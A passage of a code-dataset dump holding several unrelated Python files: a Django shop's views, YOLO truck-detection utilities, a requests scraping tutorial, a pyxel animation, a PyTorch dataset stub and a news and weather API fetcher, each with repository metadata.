] | 14 | 2020-11-19T18:55:28.000Z | 2022-02-01T22:08:23.000Z | mywebsite/shop/views.py | Zadigo/ecommerce_template | a4572c3faeaeb9cd399351c0fd1f19a4ef94de27 | [
"MIT"
] | 7 | 2020-06-30T23:55:36.000Z | 2021-11-12T00:06:40.000Z | """
Conversion Tunnel
------
checkout > shipment > payment > success
Payment process
-------
1. On submitting the form, an AJAX request is
done using Stripe in order to get the token
2. An intermediate view is used afterwards to
process the payment ofn the backend side
3. If the payment was successful, a redirect is
done to the SuccessView
"""
import json
import random
from cart import models as cart_models
from django.contrib import messages
from django.contrib.auth.mixins import LoginRequiredMixin
from django.core import cache, paginator
from django.db import transaction
from django.db.models.aggregates import Avg
from django.http.response import Http404, HttpResponseForbidden, JsonResponse
from django.shortcuts import get_object_or_404, redirect, render, reverse
from django.utils.decorators import method_decorator
from django.utils.translation import gettext
from django.utils.translation import gettext_lazy as _
from django.views.decorators.cache import cache_page, never_cache
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_POST
from django.views.generic import DetailView, ListView, TemplateView, View
from shop import models, serializers, sizes, tasks, utilities
def create_vue_products(queryset):
items = []
for product in queryset:
images = product.images
variant = product.variant
base = {
'id': product.id,
'reference': product.reference,
'url': product.get_absolute_url(),
'collection': {
'name': product.collection.name
},
'name': product.name,
'price': str(product.get_price()),
'main_image': product.get_main_image_url,
'images': list(images.values('id', 'name', 'url', 'web_url', 'variant', 'main_image')),
'variant': list(variant.values('id', 'name', 'verbose_name', 'in_stock', 'active')),
'in_stock': product.in_stock,
'our_favorite': product.our_favorite,
'is_discounted': product.is_discounted,
'price_pre_tax': str(product.price_pre_tax),
'discounted_price': str(product.discounted_price),
'slug': product.slug
}
items.append(base)
return items
@method_decorator(cache_page(60 * 30), name='dispatch')
class IndexView(View):
"""Base view for the website's shop"""
def get(self, request, *args, **kwargs):
return render(request, 'pages/shop.html')
@method_decorator(cache_page(60 * 15), name='dispatch')
class ShopGenderView(View):
"""Base view for discovering the website's shop
by category e.g. gender
"""
def get(self, request, *args, **kwargs):
context = {}
gender = kwargs.get('gender')
collections = models.Collection.objects.filter(
gender=gender.title()
)
if collections.exists():
context = {'collections': collections[:3]}
return render(request, 'pages/shop_gender.html', context)
class ProductsView(ListView):
"""Main product's page"""
model = models.Collection
template_name = 'pages/collections.html'
context_object_name = 'products'
paginate_by = 12
ordering = '-created_on'
def get_queryset(self, **kwargs):
view_name = self.kwargs.get('collection')
try:
collection = self.model.objects.get(
view_name__exact=view_name
)
except:
raise Http404("La collection n'existe pas")
else:
queryset = collection.product_set.filter(
active=True, private=False
)
category = self.request.GET.get('category', None)
if category is None:
return queryset
authorized_categories = ['all', 'promos', 'favorites']
if category in authorized_categories:
if category == 'all':
return queryset
elif category == 'promos':
return queryset.filter(discounted=True)
elif category == 'favorites':
return queryset.filter(our_favorite=True)
else:
return queryset
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
products = self.get_queryset(**kwargs)
# Set a specific pagination number to
# active depending on which page we are
context['current_active_page'] = self.request.GET.get('page', 1)
klass = super().get_paginator(products, self.paginate_by)
# serialized_products = serializers.ProductSerializer(
# instance=klass.object_list,
# many=True
# )
# context['vue_products'] = serialized_products.data
# When passing to another category, the previous
# products are still in the cache which creates
# an issue
category = self.request.GET.get('category')
# if category is not None:
# cache.cache.delete('vue_products')
# Specific technique in order to include the
# product url, main_image url and images
# vue_products = cache.cache.get('vue_products', None)
vue_products = create_vue_products(klass.object_list)
# if vue_products is None:
# cache.cache.set('vue_products', vue_products, timeout=1200)
context['vue_products'] = json.dumps(vue_products)
collection = self.model.objects.get(
view_name__exact=self.kwargs.get('collection'),
gender=self.kwargs.get('gender').title()
)
context['collection'] = collection
return context
@method_decorator(cache_page(60 * 15), name='dispatch')
class ProductView(DetailView):
"""View the details of a given product"""
model = models.Product
template_name = 'pages/product.html'
context_object_name = 'product'
def post(self, request, **kwargs):
data = {'state': False}
product = super().get_object()
# TODO: Add a method function that prevent
# triggering the rest of the method with
# any kinds of post requests
cart = cart_models.Cart.cart_manager.add_to_cart(request, product)
if cart:
data.update({'state': True})
else:
messages.error(
request,
"Une erreur s'est produite - ADD-CA",
extra_tags='alert-danger'
)
return JsonResponse(data=data)
def get_queryset(self, **kwargs):
queryset = self.model.objects.all()
return queryset
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
product = super().get_object()
serialized_product = serializers.ProductSerializer(instance=product)
context['vue_product'] = serialized_product.data
suggested_products = self.model.objects\
.prefetch_related('images') \
.filter(active=True).exclude(id=product.id)[:3]
context['more'] = suggested_products
context['has_liked'] = False
if self.request.user.is_authenticated:
likes = models.Like.objects.filter(
product=product, user=self.request.user
)
if likes.exists():
context.update({'has_liked': True})
reviews = product.review_set.all()
context['reviews'] = reviews
context['reviews_avg'] = reviews.aggregate(Avg('rating'))
return context
@method_decorator(never_cache, name='dispatch')
class PreviewProductView(LoginRequiredMixin, DetailView):
"""
This is a custom view for previewing a product
in the semi-original context of the main product page
"""
model = models.Product
queryset = models.Product.objects.all()
template_name = 'pages/preview.html'
context_object_name = 'product'
http_method_names = ['get']
def get(self, request, *args, **kwargs):
content = super().get(request, *args, **kwargs)
if not request.user.is_admin:
return HttpResponseForbidden('You are not authorized on this page')
return content
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
product = super().get_object()
serialized_product = serializers.ProductSerializer(instance=product)
context['vue_product'] = serialized_product.data
return context
@method_decorator(cache_page(60 * 30), name='dispatch')
@method_decorator(csrf_exempt, name='dispatch')
class PrivateProductView(DetailView):
"""
This is a special custom viewing a product in a non
classified manner and one that does not appear in the
urls of the main site --; this can be perfect for testing
a product from a marketing perspective
"""
model = models.Product
queryset = models.Product.product_manager.private_products()
template_name = 'pages/product.html'
context_object_name = 'product'
def post(self, request, **kwargs):
product = super().get_object()
# TODO: Add a method function that prevent
# triggering the rest of the method with
# any kinds of post requests
cart = cart_models.Cart.cart_manager.add_to_cart(request, product)
if cart:
return JsonResponse(data={'success': 'success'})
else:
return JsonResponse(data={'failed': 'missing parameters'}, status=400)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
product = super().get_object()
serialized_product = serializers.ProductSerializer(instance=product)
context['vue_product'] = serialized_product.data
return context
class SearchView(ListView):
"""Main page for displaying product searches"""
model = models.Product
template_name = 'pages/search.html'
context_object_name = 'products'
paginate_by = 10
def get_queryset(self, **kwargs):
searched_item = self.request.GET.get('q')
if searched_item is None:
return []
return self.model.product_manager.search_product(searched_item)
def get_context_data(self, **kwargs):
products = self.get_queryset(**kwargs)
context = super().get_context_data(**kwargs)
klass = super().get_paginator(self.get_queryset(**kwargs), self.paginate_by)
serialized_products = serializers.ProductSerializer(instance=klass.object_list, many=True)
context['vue_products'] = serialized_products.data
# TODO
collections = ['tops', 'pantalons']
random_collection = random.choice(collections)
collection = models.Collection.objects.get(view_name=random_collection)
proposed_products = collection.product_set.all()[:4]
context['proposed_products'] = proposed_products
return context
@method_decorator(cache_page(60 * 60), name='dispatch')
class SizeGuideView(TemplateView):
"""View for providing the customer with information
on sizes etc."""
template_name = 'pages/size_guide.html'
@require_POST
@transaction.atomic
def add_like(request, **kwargs):
data = {'state': False}
product = get_object_or_404(models.Product, id=kwargs['pk'])
if request.user.is_authenticated:
likes = product.like_set.filter(user=request.user)
if likes.exists():
return JsonResponse(data=data)
product.like_set.create(user=request.user)
else:
redirect_url = f"{reverse('accounts:login')}?next={product.get_absolute_url()}"
data.update({'redirect_url': redirect_url})
return JsonResponse(data=data)
@require_POST
def size_calculator(request, **kwargs):
"""Calcultes from customer's measurements
the correct size for him/her"""
# data = json.loads(request.body)
# bust = data['bust']
# chest = data['chest']
bust = request.POST.get('bust')
chest = request.POST.get('chest')
if bust is None and chest is None:
return JsonResponse(data={'state': False})
bust = int(bust)
chest = int(chest)
calculator = sizes.BraCalculator(bust, chest)
data = {
'state': True,
'result': calculator.get_full_bra_size,
'size': calculator.size,
'cup': calculator.cup
}
return JsonResponse(data=data)
@require_POST
@transaction.atomic
def add_review(request, **kwargs):
data = {
'state': False,
'message': "L'avis n'a pas pu être créé"
}
score = request.POST.get('score')
text = request.POST.get('text')
if request.user.is_authenticated:
product = get_object_or_404(models.Product, id=kwargs.get('pk'))
review = product.review_set.create(
user=request.user,
text=text,
rating=score
)
data.update({
'state': True,
'message': "Votre avis a été créé"
})
return JsonResponse(data=data)
| 34.546875 | 99 | 0.635761 | 1,509 | 13,266 | 5.45063 | 0.224652 | 0.017021 | 0.017021 | 0.01459 | 0.349787 | 0.304681 | 0.230881 | 0.210456 | 0.190517 | 0.169362 | 0 | 0.005388 | 0.25848 | 13,266 | 383 | 100 | 34.637076 | 0.830741 | 0.144957 | 0 | 0.332046 | 0 | 0 | 0.095558 | 0.011284 | 0 | 0 | 0 | 0.005222 | 0 | 1 | 0.065637 | false | 0 | 0.069498 | 0.003861 | 0.351351 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e585e2842a0d58243451c36eb2f3bb53a795288e | 245 | py | Python | docker/dataset/stock_analysis/run.py | jojees/operations | bb1a242efbbf56c9afbe4b9e4b5aa14218720e2b | [
"MIT"
] | null | null | null | docker/dataset/stock_analysis/run.py | jojees/operations | bb1a242efbbf56c9afbe4b9e4b5aa14218720e2b | [
"MIT"
] | 2 | 2019-09-22T11:24:19.000Z | 2019-09-22T11:38:49.000Z | docker/dataset/stock_analysis/run.py | jojees/operations | bb1a242efbbf56c9afbe4b9e4b5aa14218720e2b | [
"MIT"
] | null | null | null | """Application entry point."""
from webapp import init_app
app = init_app()
# Using a development configuration
app.config.from_object('config.DevConfig')
# print(app.config)
if __name__ == "__main__":
app.run(host="0.0.0.0", debug=False) | 22.272727 | 42 | 0.722449 | 36 | 245 | 4.611111 | 0.666667 | 0.036145 | 0.036145 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018605 | 0.122449 | 245 | 11 | 43 | 22.272727 | 0.753488 | 0.314286 | 0 | 0 | 0 | 0 | 0.191358 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e585fd72caa5f846d1fe6076b952b19c250c6439 | 19,169 | py | Python | utils/yolo_utils.py | Dishoungh/martrec | 74d0cffa3c046509017e1fd121a474ee5b50a194 | [
"MIT"
] | null | null | null | utils/yolo_utils.py | Dishoungh/martrec | 74d0cffa3c046509017e1fd121a474ee5b50a194 | [
"MIT"
] | 1 | 2021-01-28T16:57:41.000Z | 2021-01-28T18:13:34.000Z | utils/yolo_utils.py | Dishoungh/martrec | 74d0cffa3c046509017e1fd121a474ee5b50a194 | [
"MIT"
] | null | null | null | import numpy as np
import cv2 as cv
import time
import os
import sys
import multiprocessing
def init(labelfile, config, weights):
# Get the labels
labels = open(labelfile).read().strip().split('\n')
# Initializing colors to represent each label uniquely
colors = np.random.randint(0, 255, size=(len(labels), 3), dtype='uint8')
# Load the weights and configuration to form the pretrained YOLOv3 model
net = cv.dnn.readNetFromDarknet(config, weights)
# Get the output layer names of the model
layer_names = net.getLayerNames()
layer_names = [layer_names[i[0] - 1] for i in net.getUnconnectedOutLayers()]
return labels, colors, net, layer_names
def parse_input_path(input_path):
data = []
# Get everything from input path
for path in os.listdir(input_path):
if ('.png' in path) or ('.jpg' in path) or ('jpeg' in path) or ('.mp4' in path) or ('.avi' in path):
data.append(path)
return data
def start_yolo_process(args):
fileslist = parse_input_path(args.input_path)
processes = []
tag = []
# Parse through Input Data Folder
for idx, file in enumerate(fileslist):
pid = 0
while ((pid < multiprocessing.cpu_count()) and (idx < len(fileslist))):
if ((idx + pid) < len(fileslist)):
# Create Processes
try:
tFile = fileslist[idx+pid]
in_path = str(args.input_path + tFile)
processed_path = str(args.processed_folder + tFile)
arguments = (tFile,
in_path,
processed_path,
tFile[:tFile.find('.')],
args.labels,
args.config,
args.weights,
args.output_path,
args.delay_time,
args.save_video,
args.option,
args.video_output_path,
args.confidence,
args.threshold,
pid,
False,
None)
process = multiprocessing.Process(target=yolo_process, args=arguments)
if in_path not in tag:
processes.append(process)
tag.append(in_path)
except Exception as err:
print("[ERROR] {e}".format(e=err))
pid += 1
# Execute Processes
for process in processes:
try:
process.start()
except Exception as err:
print("[ERROR] {e}".format(e=err))
for process in processes:
try:
process.join()
except Exception as err:
print("[ERROR] {e}".format(e=err))
processes.clear()
def yolo_process(file, file_path, done_path, output_name, labels, config, weights, save_path, delay_time, save_video, option, video_output_path, confidence, threshold, process_id, gui, gui_obj):
image_path = None
video_path = None
if ('.png' in file_path) or ('.jpg' in file_path) or ('.jpeg' in file_path):
image_path = file_path
if ('.mp4' in file_path) or ('.avi' in file_path):
video_path = file_path
# Initialize labels, colors, and pretrain model
try:
labels, colors, net, layer_names = init(labels,
config,
weights)
except Exception as err:
print("[ERROR] {e}".format(e=err))
# If both image and video files are given then raise error
if image_path is None and video_path is None:
print('[WARNING] Neither path to an image or path to video provided. Starting Inference on Webcam...')
# Do inference with given image
if image_path:
print('[INFO] Starting image processing of {ip}...'.format(ip=str(image_path)))
if not os.path.exists(image_path):
print("[ERROR] Image path does not exist. Exiting...")
sys.exit()
# Read the image
try:
img = cv.imread(image_path)
height, width = img.shape[:2]
except:
raise Exception('[ERROR] Image cannot be loaded!\n'
'Please check the path provided!')
finally:
img, _, _, _, _, _, _, _, _ = infer_image(net, layer_names, height, width, img, colors, labels, confidence, threshold)
save_image(img, output_name, save_path)
os.rename(file_path, done_path)
elif video_path:
print('[INFO] Starting video processing of {vp}...'.format(vp=str(video_path)))
if output_name is None:
print("[ERROR] No output name specified. Exiting...")
sys.exit()
if not os.path.exists(video_path):
print("[ERROR] Video path does not exist. Exiting...")
sys.exit()
# Read the video
try:
vid = cv.VideoCapture(video_path)
boxHeight, boxWidth = 0, 0
height, width = None, None
writer = None
except:
raise Exception('[ERROR] Video cannot be loaded!\n'
'Please check the path provided!')
finally:
timings = np.array([])
# Will attempt to count the number of frames in the video,
# This is dependent on the OpenCV version
try:
total = int(vid.get(cv.CAP_PROP_FRAME_COUNT))
except:
try:
total = int(vid.get(cv.CV_CAP_PROP_FRAME_COUNT))
except:
print("[WARNING] Have to count frames manually. This might take a while...")
total = count_frames_manual(vid)
print("[SUCCESS] Count complete...")
delay = delay_time
num_images = 0
# Scan each frame in video
while True:
grabbed, raw_frame = vid.read()
try:
labeled_frame = raw_frame.copy()
except:
labeled_frame = None
# Checking if the complete video is read
if not grabbed:
break
if width is None or height is None:
height, width = labeled_frame.shape[:2]
if writer is None and save_video is True:
# Initialize the video writer
fourcc = cv.VideoWriter_fourcc(*"MJPG")
writer = cv.VideoWriter(video_output_path, fourcc, 30,
(labeled_frame.shape[1], labeled_frame.shape[0]), True)
# Time frame inference and show progress
start = time.time()
if delay <= 0 and labeled_frame is not None:
labeled_frame, _, _, classids, _, xPos, yPos, boxWidth, boxHeight = infer_image(net,
layer_names,
height,
width,
labeled_frame,
colors,
labels,
confidence,
threshold)
try:
obj = labels[classids[0]]
except:
obj = None
# Descriptions of a typical freight truck
if (((obj == 'truck') and (boxWidth >= (boxHeight * 1.5))
and (boxHeight >= 0.4 * height)
and (boxWidth >= 0.7 * width))):
# Extract Timestamp from Video (TODO: Explore with this: https://www.geeksforgeeks.org/text-detection-and-extraction-using-opencv-and-ocr/)
try:
modified_name = output_name + ('_{time}'.format(time=str(int(vid.get(cv.CAP_PROP_POS_MSEC)))))
# print(modified_name)
except:
# print("[ERROR] Failed to get timestamp of video")
modified_name = output_name + '_?'
#report_image_attributes(modified_name, xPos, boxWidth, boxHeight, width, height)
if (option == 0) or (option == 2): # Save raw image
save_image(raw_frame, modified_name, save_path, True)
num_images += 1
if (option == 1) or (option == 2): # Save labeled image
save_image(labeled_frame, modified_name, save_path, False)
num_images += 1
if (option == 3): # Save Collage
try:
collage_name = str(modified_name + "_collage.png")
primary = raw_frame
# Capture secondary frame (10 frames over)
for i in range(10):
_, secondary = vid.read()
# Put two images vertically on a collage
save_image(np.vstack([primary, secondary]), collage_name, save_path, True)
num_images += 1
except Exception as err:
print("[ERROR] {e}".format(e=err))
delay = delay_time
delay -= 1
if save_video is True:
writer.write(labeled_frame)
end = time.time()
timings = np.append(timings, (end - start))
show_progress_bar(timings.size, total, num_images, np.average(timings), output_name, process_id)
# Return progress bar value
if gui is True:
gui_obj.bar['value'] = (timings.size / total) * 100
gui_obj.bar.update_idletasks()
# End process
print("\n[INFO] Cleaning up...")
if writer is not None:
writer.release()
vid.release()
os.rename(file_path, done_path)
else:
# Infer real-time on webcam
count = 0
vid = cv.VideoCapture(0)
while True:
_, frame = vid.read()
height, width = frame.shape[:2]
if count == 0:
frame, boxes, confidences, classids, index, _, _, _, _ = infer_image(net,
layer_names,
height,
width,
frame,
colors,
labels,
confidence,
threshold)
count += 1
else:
frame, boxes, confidences, classids, index, _, _, _, _ = infer_image(net,
layer_names,
height,
width,
frame,
colors,
labels,
confidence,
threshold,
boxes,
confidences,
classids,
index,
infer=False)
count = (count + 1) % 6
cv.imshow('webcam', frame)
if cv.waitKey(1) & 0xFF == ord('q'):
break
vid.release()
cv.destroyAllWindows()
print("[SUCCESS] Image Processing Complete...")
def report_image_attributes(modified_name, xPos, boxWidth, boxHeight, width, height):
print("Name: {n}".format(n=modified_name))
print("X Position: {x}".format(x=xPos))
print("BoxWidth: {bw}".format(bw=boxWidth))
print("BoxHeight: {bh}".format(bh=boxHeight))
print("Image Width: {iw}".format(iw=width))
print("Image Height: {ih}\n\n".format(ih=height))
def save_image(img, output_name, save_path, raw):
num = 1
while True:
if raw is True:
filename = '{s}{o}_{n}_raw.png'.format(s=save_path, o=output_name, n=num)
else:
filename = '{s}{o}_{n}_labeled.png'.format(s=save_path, o=output_name, n=num)
if os.path.isfile(filename):
num += 1
else:
cv.imwrite(filename, img)
break
def draw_labels_and_boxes(img, boxes, confidences, classids, idxs, colors, labels):
# If there are any detections
x, y, w, h = 0, 0, 0, 0
if len(idxs) > 0:
for i in idxs.flatten():
# Get the bounding box coordinates
x, y = boxes[i][0], boxes[i][1]
w, h = boxes[i][2], boxes[i][3]
# Get the unique color for this class
color = [int(c) for c in colors[classids[i]]]
# Draw the bounding box rectangle and label on the image
cv.rectangle(img, (x, y), (x + w, y + h), color, 2)
text = "{}: {:4f}".format(labels[classids[i]], confidences[i])
cv.putText(img, text, (x, y - 5), cv.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)
return img, x, y, w, h
def generate_boxes_confidences_classids(outs, height, width, tconf):
boxes = []
confidences = []
classids = []
for out in outs:
for detection in out:
# Get the scores, class ID, and the confidence of the prediction
scores = detection[5:]
classid = np.argmax(scores)
confidence = scores[classid]
# Consider only the predictions that are above a certain confidence level
if confidence > tconf:
box = detection[0:4] * np.array([width, height, width, height])
centerX, centerY, bwidth, bheight = box.astype('int')
# Using the center x, y coordinates to derive the top
# and the left corner of the bounding box
x = int(centerX - (bwidth / 2))
y = int(centerY - (bheight / 2))
# Append to list
boxes.append([x, y, int(bwidth), int(bheight)])
confidences.append(float(confidence))
classids.append(classid)
return boxes, confidences, classids
def infer_image(net, layer_names, height, width, img, colors, labels, confidence, threshold,
boxes=None, confidences=None, classids=None, idxs=None, infer=True):
if infer:
# Constructing a blob from the input image
blob = cv.dnn.blobFromImage(img, 1 / 255.0, (416, 416),
swapRB=True, crop=False)
# Perform a forward pass of the YOLO object detector
net.setInput(blob)
# Getting the outputs from the output layers
outs = net.forward(layer_names)
# Generate the boxes, confidences, and classIDs
boxes, confidences, classids = generate_boxes_confidences_classids(outs, height, width, confidence)
# Apply Non-Maxima Suppression to suppress overlapping bounding boxes
idxs = cv.dnn.NMSBoxes(boxes, confidences, confidence, threshold)
if boxes is None or confidences is None or idxs is None or classids is None:
raise Exception('[ERROR] Required variables are set to None before drawing boxes on images.')
# Draw labels and boxes on the image
img, x, y, w, h = draw_labels_and_boxes(img, boxes, confidences, classids, idxs, colors, labels)
return img, boxes, confidences, classids, idxs, x, y, w, h
def show_progress_bar(count, total, num_images, diff, name, pid, status=''):
bar_length = 40
filled_length = int(round(bar_length * count / float(total)))
percentage = round(100.0 * count / float(total), 1)
bar = '=' * filled_length + '-' * (bar_length - filled_length)
sec_left = diff * (total - count)
sys.stdout.write("%s[%s] %s%s (%s) %s ...%s\r\n" % ('{p}:'.format(p=name),
str(bar),
str(percentage),
'%',
time.strftime('%Hh, %Mm, %Ss', time.gmtime(sec_left)),
'[{i}]'.format(i=num_images), status))
#sys.stdout.flush()
def count_frames_manual(video):
total = 0
while True:
grabbed, frame = video.read()
if not grabbed:
break
total += 1
video.release()
return total
| 42.787946 | 194 | 0.440816 | 1,807 | 19,169 | 4.559491 | 0.210293 | 0.025246 | 0.032043 | 0.012137 | 0.220658 | 0.181818 | 0.154995 | 0.125865 | 0.125865 | 0.116883 | 0 | 0.009754 | 0.475873 | 19,169 | 447 | 195 | 42.883669 | 0.810292 | 0.098284 | 0 | 0.271566 | 0 | 0 | 0.05883 | 0.001276 | 0 | 0 | 0.000232 | 0.002237 | 0 | 1 | 0.035144 | false | 0 | 0.019169 | 0 | 0.073482 | 0.067093 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5862640078cc1b43e3103a6081579e3c5f73b50 | 1,386 | py | Python | collectDataFromNet/postTest.py | xu6148152/Binea_Python_Project | d943eb5f4685d08f080b372dcf1a7cbd5d63efed | [
"MIT"
] | null | null | null | collectDataFromNet/postTest.py | xu6148152/Binea_Python_Project | d943eb5f4685d08f080b372dcf1a7cbd5d63efed | [
"MIT"
] | null | null | null | collectDataFromNet/postTest.py | xu6148152/Binea_Python_Project | d943eb5f4685d08f080b372dcf1a7cbd5d63efed | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- encoding: utf-8 -*-
import requests
def simple_post_test():
params = {'firstname': 'Ryan', 'lastname': 'Mitchell'}
r = requests.post("http://pythonscraping.com/files/processing.php", data=params)
print(r.text)
def cookie_test():
params = {'username': 'Ryan', 'password': 'password'}
r = requests.post("http://pythonscraping.com/pages/cookies/welcome.php", params)
print("Cookie is set to:")
print(r.cookies.get_dict())
print("------------------")
print("Going to profile page...")
r = requests.get("http://pythonscraping.com/pages/cookies/profile.php", cookies=r.cookies)
print(r.text)
def session_test():
session = requests.Session()
params = {'username': 'username', 'password': 'password'}
s = session.post("http://pythonscraping.com/pages/cookies/welcome.php", params)
print("Cookie is set to:")
print(s.cookies.get_dict())
print("-----------------")
print("Going to profile page...")
s = session.get("http://pythonscraping.com/pages/cookies/profile.php")
print(s.text)
def auth_test():
from requests.auth import AuthBase
from requests.auth import HTTPBasicAuth
auth = HTTPBasicAuth('ryan', 'password')
r = requests.post(url="http://pythonscraping.com/pages/auth/login.php",auth=auth)
print(r.text)
if __name__ == '__main__':
auth_test() | 30.130435 | 94 | 0.647186 | 172 | 1,386 | 5.122093 | 0.30814 | 0.122588 | 0.143019 | 0.14756 | 0.421112 | 0.421112 | 0.372304 | 0.372304 | 0.267877 | 0.172531 | 0 | 0.001709 | 0.155844 | 1,386 | 46 | 95 | 30.130435 | 0.751282 | 0.032468 | 0 | 0.21875 | 0 | 0 | 0.389552 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0.09375 | 0.09375 | 0 | 0.21875 | 0.375 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
e5882538b7bda731c247750333cac651bac62825 | 775 | py | Python | python_pyxel/pyxel1.py | Perceu/tiktok | c3da4d0a6300867737c1574a552100bdf5eed10f | [
"MIT"
] | null | null | null | python_pyxel/pyxel1.py | Perceu/tiktok | c3da4d0a6300867737c1574a552100bdf5eed10f | [
"MIT"
] | null | null | null | python_pyxel/pyxel1.py | Perceu/tiktok | c3da4d0a6300867737c1574a552100bdf5eed10f | [
"MIT"
] | null | null | null | from turtle import width
import pyxel
from random import randint
class App:
def __init__(self):
width, height = 720, 1280
pyxel.init(width, height)
self.raio = 10
self.color = 1
self.position_x = int(width/2)
self.position_y = int(height/2)
pyxel.run(self.update, self.draw)
def update(self):
if pyxel.btnp(pyxel.KEY_Q):
pyxel.quit()
self.raio = (self.raio + 10) % pyxel.width
if self.raio <= 10:
self.position_x = randint(200,500)
self.position_y = randint(200,1000)
self.color = (self.color + 1) % 15
def draw(self):
pyxel.cls(0)
pyxel.circb(self.position_x, self.position_y, self.raio, self.color)
App() | 23.484848 | 76 | 0.575484 | 106 | 775 | 4.103774 | 0.367925 | 0.165517 | 0.068966 | 0.064368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.061682 | 0.309677 | 775 | 33 | 77 | 23.484848 | 0.751402 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0 | 0.291667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e589291903c062b835adf5adc75c3f7669bcca6a | 723 | py | Python | dataset.py | chengsen/Pytorch_model_train_template | 7da63210ac4015df74baef0205776abe9dc2b5d8 | [
"MIT"
] | null | null | null | dataset.py | chengsen/Pytorch_model_train_template | 7da63210ac4015df74baef0205776abe9dc2b5d8 | [
"MIT"
] | null | null | null | dataset.py | chengsen/Pytorch_model_train_template | 7da63210ac4015df74baef0205776abe9dc2b5d8 | [
"MIT"
] | null | null | null | from torch.utils.data import DataLoader, Dataset
__build__ = 2018
__author__ = "singsam_jam@126.com"
def get_loader(args, kwargs):
train_loader = DataLoader(dataset=ModelDataset, batch_size=args.test_batch_size, collate_fn=collate_fn, shuffle=True,
**kwargs)
test_loader = DataLoader(dataset=ModelDataset, batch_size=args.test_batch_size, collate_fn=collate_fn, shuffle=False,
**kwargs)
return train_loader, test_loader
class ModelDataset(Dataset):
def __init__(self):
pass
def __getitem__(self, index):
item = None
return item
def __len__(self):
raise NotImplementedError
def collate_fn():
pass
| 25.821429 | 121 | 0.672199 | 84 | 723 | 5.345238 | 0.488095 | 0.100223 | 0.10245 | 0.155902 | 0.383074 | 0.383074 | 0.383074 | 0.383074 | 0.383074 | 0.383074 | 0 | 0.012844 | 0.246196 | 723 | 27 | 122 | 26.777778 | 0.811009 | 0 | 0 | 0.210526 | 0 | 0 | 0.026279 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.263158 | false | 0.105263 | 0.052632 | 0 | 0.473684 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
e5893301e5d8b6496d1b088428d496d181d86dbc | 2,386 | py | Python | get_apis.py | Pemacope/Assessment_3 | 37591a8c2245b0d64dcb1b75326a7a82de45480f | [
"Unlicense"
] | null | null | null | get_apis.py | Pemacope/Assessment_3 | 37591a8c2245b0d64dcb1b75326a7a82de45480f | [
"Unlicense"
] | null | null | null | get_apis.py | Pemacope/Assessment_3 | 37591a8c2245b0d64dcb1b75326a7a82de45480f | [
"Unlicense"
] | null | null | null | from uk_covid19 import Cov19API
import geocoder
import logging
import requests
import json
logging.basicConfig(filename = "sys.log", encoding = 'utf-8')
#get_location function
def get_location():
"""This function gets the location of the user"""
current_location_data = geocoder.ip('me')
return current_location_data.city
#get news function
def get_news() -> None:
"""Getting data from news api"""
#Data request from the api
base_url = "https://newsapi.org/v2/top-headlines?"
with open('config.json', 'r') as config_file:
temp = json.load(config_file)
api_key = temp["keys"]["news_key"]
country = "gb"
complete_url = base_url + "country=" + country + "&apiKey=" + api_key
response = requests.get(complete_url, timeout = 10)
if response.status_code <= 400:
logging.info('News request failed')
#store news in file
with open('news.json', 'w') as news_file:
json.dump(response.json(), news_file)
#get weather function
def get_weather() -> None:
"""Getting data from weather API"""
base_url = "http://api.openweathermap.org/data/2.5/weather?"
with open('config.json', 'r') as config_file:
temp = json.load(config_file)
api_key = temp["keys"]["weather_key"]
city_name = get_location()
complete_url = base_url + "appid=" + api_key + "&q=" + city_name
response = requests.get(complete_url, timeout = 10)
if response.status_code >= 400:
logging.info('Weather request failed')
#store weather data in file
with open('weather.json', 'w') as weather_file:
json.dump(response.json(), weather_file)
